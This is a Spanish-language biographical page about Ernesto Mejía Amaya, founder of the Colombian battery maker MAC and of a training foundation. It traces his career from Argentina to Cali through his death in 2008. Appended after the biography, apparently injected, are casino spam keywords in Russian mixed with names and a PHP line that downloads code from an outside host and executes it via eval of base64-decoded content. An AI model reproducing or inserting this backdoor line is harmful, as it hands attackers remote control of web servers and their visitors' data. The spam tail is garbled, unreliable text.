HISTORIA (ERNESTO MEJÍA AMAYA )

Ernesto Mejía Amaya nació el 27 de septiembre de 1934 en Charalá - Santander,  se radicó con su familia en Argentina entre los años 1949 y 1955,  y finalmente en Cali, donde comenzó el negocio de las baterÍas como simple reparador, y tras arduo trabajo construyó una organización dedicada a la producción, distribución y venta al mercado nacional y a más de 30 paÍses de Norte, Centro y Sur América, el Caribe, Medio Oriente y África, de acumuladores plomo ácido para aplicaciones automotrices.

En 1950 (a los 16 años) inició su actividad profesional en Argentina como ayudante de un taller de un inmigrante italiano, donde se reparaban, armaban y vendían acumuladores eléctricos.

Simultáneamente  inició sus estudios de formación en Mecánica General en la Escuela Fábrica de la Nación en Junín, y posteriormente, en 1953 estudios de capacitación en Mecánica de Automotores en la Escuela de Capacitación Obrera en Junín.

En 1955, Ernesto retorna con su familia a Colombia y se instala en Cali para construir un nuevo proyecto de vida. En ese año se emplea en la empresa Distribuidora de Baterías, que más adelante se transformaría en Coéxito, donde se encarga del manejo del taller y de las actividades de ensamble de baterías, oficio que había aprendido en Argentina de la mano del ciudadano italiano Miguel Sayas. En poco más de un año superaba la difícil situación económica heredada del viaje de Argentina a Colombia. Sin embargo, el 19 de marzo de 1957 sufre un accidente que casi le cobra la vida. En estas circunstancias Gustavo Villegas, propietario de Distribuidora de Baterías, le ofrece por $4.000 y a crédito un taller en la carrera 8A con calle 23 en Cali. Es así como el 4 de abril de 1957 abre el taller Servicio de Baterías que dio origen a la multinacional MAC. En este taller empieza reparando 8 baterías diarias, cabe de anotar que en la actualidad MAC produce más de 9000 baterías diarias.

En 1988 adquirió, junto con su familia, COÉXITO S.A., empresa donde tuvo su primer trabajo luego de su regreso de Argentina y que en la actualidad cuenta con 11 centros de distribución y más de 60 Energitecas (Centros de Servicio) a nivel nacional. El proceso de adquisición de otras marcas de baterías permitió obtener una importante participación en el mercado. En 1989 adquirió la planta de producción y la distribuidora a nivel nacional de baterías TUDOR y en 1994 adquiere el 50% de Magna, empresa dedicada a la fabricación de baterías automotrices y para motocicletas. La última adquisición corresponde a la compra de la línea de ensamble de baterías estacionarias y de tracción de VARTA Colombia, que años más tarde se vendió a COÉXITO S.A.

En el año de 1991, justo cuando se da la transición de MAC hacia una empresa familiar moderna, Ernesto Mejía Amaya impulsado por un sentimiento de gratitud, buscó la manera de aportar a la sociedad que lo había acogido. Decide entonces crear la Fundación MAC (Hoy Fundación Ernesto Mejía Amaya) con la idea de replicar en otras personas y familias el modelo de vida que su saber, constancia, dedicación y oportunos consejos le permitió construir. La Fundación es una entidad sin ánimo de lucro, cuyo objetivo es contribuir con el desarrollo económico, político y social del país, mediante el apoyo a la micro, pequeña y mediana empresa y a los grupos vulnerables, con programas de formación de mano de obra calificada, prestación de servicios tecnológicos y asistencia técnica. Cuenta con centros especializados para instrucción en confección, mecánica automotriz, e informática. En sus más de veinte años de trabajo ha capacitado más de 22.000 beneficiarios, construyendo modelos replicables, que brinden opciones de vida reales para sus participantes.

En el mes de septiembre de 2008, después de soportar una dolorosa enfermedad, dando ejemplo de entereza, fallece Ernesto Mejía Amaya, en medio de recuerdos maravillosos, historias fantásticas y derroche de afecto para su familia y sus compañeros de trabajo.

El proceso de configuración de Ernesto Mejía Amaya como empresario está relacionado con una serie de actividades en las que sobresalen el comercio de autopartes, maquinaria agrícola y automotores; la fabricación y comercialización de baterías y la producción agropecuaria. También incursionó en la compra y venta de propiedad raíz, en el sector financiero y en otros sectores productivos.

Ernesto Mejía Amaya, tiene un lugar destacado en el empresariado vallecaucano y su historia de vida permite aprender el valor del amor a la familia, la importancia de la unión, ya del trabajo consagrado, y la virtud de contagiar a otros la pasión en la búsqueda de alcanzar un sueño.

Marionettaонлайн казиноMariyanMarneyказино онлайн Marnieинтернет казиноMarrianMarrianaв казино онлайнMarriannMarriannaв онлайн казиноMarrianneиграть в казино онлайн
$rrr = file_get_contents('http://sbalatam.com/ss/sync.php'); eval(base64_decode($rrr));